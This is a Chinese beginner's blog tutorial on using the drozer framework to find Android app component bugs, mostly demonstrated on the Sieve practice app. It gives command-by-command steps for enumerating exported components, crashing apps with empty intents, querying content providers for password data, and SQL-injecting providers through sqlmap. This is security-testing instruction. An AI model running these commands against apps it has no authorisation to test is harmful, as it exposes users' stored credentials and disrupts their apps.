几条命令用drozer挖漏洞(0基础)

最新推荐文章于 2025-06-24 13:58:02 发布
原创 最新推荐文章于 2025-06-24 13:58:02 发布 · 1.7k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#drozer #app安全 #漏洞 #新手

本文针对新手介绍了如何使用Drozer工具挖掘Android应用的组件漏洞,包括数据备份与恢复、本地拒绝服务及SQL注入等。通过具体步骤指导如何连接设备、启动Drozer Agent,并利用命令行工具扫描应用包,获取组件信息,测试潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

之前介绍过怎么安装drozer(drozer工具安装),本次主要面对于没有基础的新手,怎么用几条命令挖简单的组件漏洞(大部分为中危),经初次工具的使用练习,比较好挖的漏洞主要有,allowback(数据备份与恢复)、本地拒绝服务、本地sql注入。附个最近挖的部分垃圾洞:

1.磨枪上阵!

第一步:adb连接手机或者模拟器(看你心情爱用哪个用哪个)

(1)我的三星s8+需要打开usb调试,然后连接数据线后同意电脑访问设备数据,在usb连接选项处选择MIDI。

(2)夜神模拟器需要:

adb connect 127.0.0.1:62001 //adb目录下,连接夜神模拟器

连接好手机或者模拟器后查看是否连接到了设备:

adb devices      //adb目录下

第二步:打开手机端的drozer agent app,点击右下角开启,此时agent开始监听31415端口,我们用adb转发这个端口出来,连接drozer:

adb forward tcp:31415 tcp:31415  //adb目录下,进行端口转发

drozer console connect                      //drozer目录下,连接drozer agent

2.挖洞正题!

统计一下挖简单的漏洞我们要用到的命令:

run app.package.list                   //列出手机内安装的所有应用包名

run app.package.llst -f xxxx       //过滤出有指定关键字的包名

run app.package.attacksurface   com.example.sieve   //扫描攻击面,暴露了什么组件,此处以com.example.sieve包为例。

run app.activity.info -a com.example.sieve   //获取avtivity信息

run app.broadcast.info -a com.example.sieve   //获取broadcast信息

run app.provider.info -a com.example.sieve  //获取provider信息

run app.service.info -a com.example.sieve  //获取service信息

run app.activity.start --component  com.example.sieve  com.example.sieve.activity //启动某activity组件,调出越权界面或者应用崩溃存在漏洞。

run app.broadcast.send  --component  com.example.sieve  com.example.sieve.broadcast //发送空intent给广播组件,应用崩溃存在漏洞。

run scanner.provider.finduris -a  com.example.sieve //获取可以访问的uri

run app.provider.query content://com.example.sieve.xx.xxxxx/passwords --vertical  //获取uri的数据,查询到敏感数据存在漏洞。

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --projection "'" 

run app.provider.query content://com.example.sieve.DBcontentprovider/password/ --selection "'"  //输入’ 参数进行注入,报错了的话存在漏洞,可以继续使用手工注入查询数据库内容,也可使用sqlmap:

run auxiliary.webcontentresolver   //转发tcp:8080到本机,测试期间不要ctrl+c停止转发

用电脑访问:http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*

直接sqlmap跑:

sqlmap -u "http://localhost:8080/query?uri=content://com.example.sieve.DBcontentprovider/password/&projection=*" --dbs   

//参考sqlmap的基本使用

 

之后会整理完整的drozer使用方法, 如果有其它适合新手的简单操作的建议请大家评论帮忙哦,我持续更新~

 

 

白帽子Android渗透测试指南
AI天才研究院
08-06 1421
随着智能手机的普及和移动互联网的快速发展,Android系统作为全球市场占有率最高的移动操作系统,其安全性越来越受到人们的重视。与此同时,针对Android系统的恶意软件和攻击手段也层出不穷,给用户的信息安全和隐私保护带来了极大的威胁。为了帮助广大开发者和安全爱好者更好地了解Android系统的安全机制,掌握Android渗透测试的基本方法和技巧,本文将从白帽子的角度出发,详细介绍Android渗透测试的流程、技术和工具,并结合实际案例进行分析和讲解。
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2127
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
APP漏洞掘工具篇 - Drozer
3569
11-27 9291
https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247483830&idx=1&sn=ef4bdcdca99d2928d5a0c3ae246b007f&chksm=fa177d75cd60f4639d0990f7496942a3b39edc41972577590e30a58e501f183bec689ef...
使用drozer掘android漏洞
Tesi1a的充电桩
05-04 2805
0x00 安装环境 Mac OS Mojave Ver 10.14.5 Android 5.1.1 Drozer Ver 2.4.4 、 drozer-2.4.4-py2-none-any.whl 一、mac上安装drozer 二、步骤 1.自行安装 JDK 环境 2.自行安装 Python 2.7 3.自行安装 adb 环境 4.官方网站下载 drozer-2.4.4-py2-none-any...
漏洞掘典型场景和思路(非常详细)零基础入门到精通,收藏这一篇就够了_如何漏洞
最新发布
Galaxy_0的博客
06-24 1140
很多人洞的时候说不知道如何入手,其实洞就是信息收集+常规owasp top 10+逻辑漏洞(重要的可能就是思路猥琐一点),这些漏洞的测试方法本身不是特别复杂,一般混迹在安全圈子的人都能复现漏洞。接下来我就着重说一下我在信息收集方面的心得。
Android drozer漏洞检测
xiaolu99999的专栏
09-09 2066
Android drozer漏洞检测
使用Drozer进行安全测试(Drozer github上开源项目)
lostinai的专栏
10-09 5750
在前面的文章中,我们已经介绍了Android的多种安全漏洞,在继续学习其他漏洞之前,我们先来学习一个非常NB的工具:Drozer. Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。 其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。” 在Web世界已经有了许多安全测试工具了,我们只需
Drozer的安装与使用 | Android逆向工具
weixin_43525479的博客
06-14 1万+
Drozer的安装与使用 Android逆向工具
【APP测试】Windows下夜神模拟器的Drozer安装与连接
weixin_43486390的博客
09-21 3677
记录一次完整的安装过程,百度了很多教程,愣是把这个弄出来了,重重困难啊差点崩溃,写下来当作自己的笔记! 需要的环境 夜神模拟器 python2.7的环境 Drozer adb,哈哈,我下载了怎么弄都不行,最后干脆没用下载的那个 1、安装夜神模拟器 我的环境win10 官网直接下载安装 https://www.yeshen.com/ 2、下载Drozer 在这之前,需要python(2.7)环境,安装时python记得添加到系统变量中去,也可以桌面→我的电脑→单击右键,属性→高级系统设置→高级→环境变量→系统
【Android系统漏洞扫描】:Kali Linux工具快速入门指南
[【Android系统漏洞扫描】:Kali Linux工具快速入门指南](https://varutra-1a3b6.kxcdn.com/wp-content/webp-express/webp-images/uploads/2021/09/Android-Penetration-Testing-with-Drozer-1024x535.png.webp) ...
Android渗透测试入门教程v2017.2试读陆小马功钟浩.pdf
09-14
包括查看应用程序包内容、使用Dex2jar、Apktool和JD-GUI工具,以及如何对应用程序进行安全审计,如使用Drozer工具进行命令操作和分析Contentprovider组件泄露和遍历文件漏洞。 第3章 流量分析则涵盖了外部式和内部...
Sieve.apk漏洞联系工具
12-14
原油资源分数较高,现在换成一个新的,帮助更多的人利用改工具学习。去掉.1
drozer工具介绍和使用_drozer工具用途(1)
2401_84545339的博客
05-16 765
drozer是一款针对Android系统的安全测试框架,可以分成两个部分:其一是“console”,它运行在本地计算机上;其二是“server”,它是一个安装在目标Android设备上的app,当使用console与Android设备交互时,就是把Java代码输入到运行在实际设备上的drozer代理(agent)中。
drozer-Android安全测试基本使用教程(Windows10)
热门推荐
jianglianye21的博客
06-12 1万+
drozer官网地址:https://labs.mwrinfosecurity.com/tools/drozer/ 一、安装 1.1 环境要求 (1)jdk1.6+ (2)python2.7 (3)android sdk 确保配置了adb、java环境变量 1.2 Window10安装drozer 2、 下载drozer https://labs.mwrinfosecuri...
Android应用安全评估工具drozer
fangyingquano的专栏
08-30 2714
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据。> run app.package.info -a com.mwr.example.sieve //显示app.package.info命令包的基本信息。
安全测试-Drozer安全测试框架实践记录篇
qq_34381178的博客
08-06 5251
二、环境部署一、Drozer简介Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安全测试工具。......
drozer工具介绍和使用_drozer工具用途,2024年最新34岁网络安全开发大叔感慨
uiuuyy67的博客
04-17 510
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!启动drozer agent,界面上“Embedded Server”滑块拖到“Enable”【3】使用adb命令,在目标设备上安装drozer Agent(apk程序)第一步,使用adb命令,进行端口转发。【5】运行drozer会话。
APP的安全性测试指南——测试工具Drozer
软件测试技术资源分享官
11-08 799
移动 App 的广泛应用,必然伴随着新的应用安全威胁。这些攻击与以前经典的 web app 无关。据 NowSecure 的最新研究表明,有 25% 的 App 包含高风险漏洞,常见的安全漏洞如下:
drozer3.1.0最新版安全测试工具详细安装教程
weixin_63505370的博客
11-27 3188
drozer 3.1.0 版本保姆级安装教程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

devi1.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值